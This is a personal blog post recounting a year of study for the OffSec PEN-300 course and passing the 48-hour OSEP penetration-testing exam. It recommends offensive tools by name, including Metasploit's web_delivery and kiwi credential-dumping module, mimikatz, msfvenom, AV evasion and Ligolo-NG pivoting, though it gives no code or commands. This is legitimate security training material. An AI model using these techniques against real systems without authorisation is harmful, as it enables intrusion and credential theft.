OSEP in 2024
Overcoming another challenge - the PEN-300 course by Offsec and earning the OSEP certificate!
Tldr; I passed!
The OSEP is the follow up to the taste of offensive security that is OSCP. It builds on the offensive security skills learned and extends them to a Windows-heavy environment where you'll be tasked with not only standard enumeration and exploitation, but also evading active AV protections.
My journey on the OSEP started in 2022 when I signed up for Offsec's Learn One deal during their annual Christmas sale and I started in Feburary 2023. Due to the density and breadth of the course, I thought it would be quite challenging to complete it within 90 day option which was why I decided to take the year to learn all the material in the course. I was not wrong.
The coursework was demanding but well-structured. Each section builds on the next and it encourages creativity in using existing tools and methods to overcome each new challenge. The extra miles and challenges help in consolidating the knowledge learned by combining the methods taught previously to obtain new methods of execution.
This course delves deeper into the MSDN documentation, with a primary emphasis on crafting C# code for personalized tooling within Visual Studio. The process was seamless and quite painless. Given my initial lack of familiarity with C#, the opportunity to learn a new language to expand my repertoire is always welcomed. Being able to write your own exploitation tools not only helped me to understand them in greater detail, but also built confidence in my own ability to adapt existing tools to new uses.
The course centers on mastering lateral movement in an Active Directory, Windows-centric environment, with a heavy reliance on Metasploit throughout. Beyond the essential tasks of obfuscating and creating personalized C# assemblies, I realized, especially during the challenges, that familiarity with Metasploit's diverse modules and payloads significantly reduces the workload in post-exploitation. For instance, the web_delivery
script automates the process of upgrading code execution to a full-featured metapreter session. The kiwi
module provides a quick alternative for dumping credentials within the session, eliminating the need for dropping mimikatz or running Invoke-Mimikatz
. Exploring all the options of metapreter and msfvenom proved to be instrumental for speeding up my progress during the course.
In contrast to my experience with OSCP/PEN-200 in 2022, the material in this course is notably current, and the instructions are presented with clarity. While there were one or two instances where references to outdated frameworks and tools surfaced, they were tangential and did not detract from the overall learning experience. I believe that Offsec should consider more periodic material refreshes, as encounters with obsolete code or frameworks are a prevalent source of frustration in these courses when they require complex workarounds or are no longer effective.
In the course, exploits undergo recompilation based on situational requirements. This approach not efficient, particularly when minor adjustments such as pathnames are the only variations needed. I felt that it would have been more advantageous to teach and compile a versatile version of executables capable of incorporating variables as part of their execution.
Moreover, although most topics hold their weight, a few felt somewhat misplaced when compared to the cohesive flow of earlier chapters, with notable examples being the Kiosk Breakouts and those centered on Linux being somewhat disjointed and weaker in comparison to those concentrating on Windows environments.
Exam day
The OSEP exam is a 48 hour affair and knowing this, I tried to get enough rest beforehand, but found it hard to sleep. As the exam approached, I logged in early, only to find myself unable to type into the proctoring chat or receive any messages. Despite trying to troubleshoot by restarting the browser or switching to a different one, the issue persisted. With each passing moment of my exam time, a sense of panic began to set in. It wasn't until a bit later that I realized the culprit was an extension on my browser. A big shoutout and thanks to Offsec; my proctor informed me that additional time would be given due to the delayed start of my exam, even though the delay was my own doing.
I found that the exam was closely aligned with the course material, and Offsec did an excellent job of preparing me, especially through the challenge labs, which had revisited the content in a more structured manner. If there's one area I felt I could have dedicated more attention to, it would be enumeration and Windows privilege escalation, which seemed a bit under-emphasized in the coursework.
One tool that turned out to be immensely successful for me in the challenge labs and the exam was Ligolo-NG. It offers a very smooth interface for network pivoting as compared to Chisel or SSH proxying. I highly recommend becoming familiar with this tool, as it simplifies many pivoting processes.
Even though I didn't end up utilizing all the scripts and code I prepared, having different methods ready proved to be beneficial during the exam. It provided me with multiple trusted approaches for various actions, preventing the need to scramble with untested scripts or code. I recommend using the challenge labs to practice and refine your skills. There was a point where I got stuck and had to resort to using untested code and methods, and that was not a pleasant experience.
I did not get much sleep during the exam period, even though I lay in bed, but I think I was too wired to sleep, and I think I ended up only having nine hours of rest during the exam.
It took me a day and a half to accomplish my exam objectives, and I spent the rest of the time attempting the other machines. I spent the next day writing my report and I submitted it on Friday.
It was a long and agonizing wait, because I was sure my report was not detailed enough, but I finally received the results two business days after I submitted my exam.
What an exhilarating feeling that was! A year's worth of effort finally paying off is always such a sense of relief and accomplishment. I think this course stretched me in a great way, and gave me many new ideas and methods to approach my work in the coming year.
I look forward to more learning this year and I can't wait to put these new skills to work!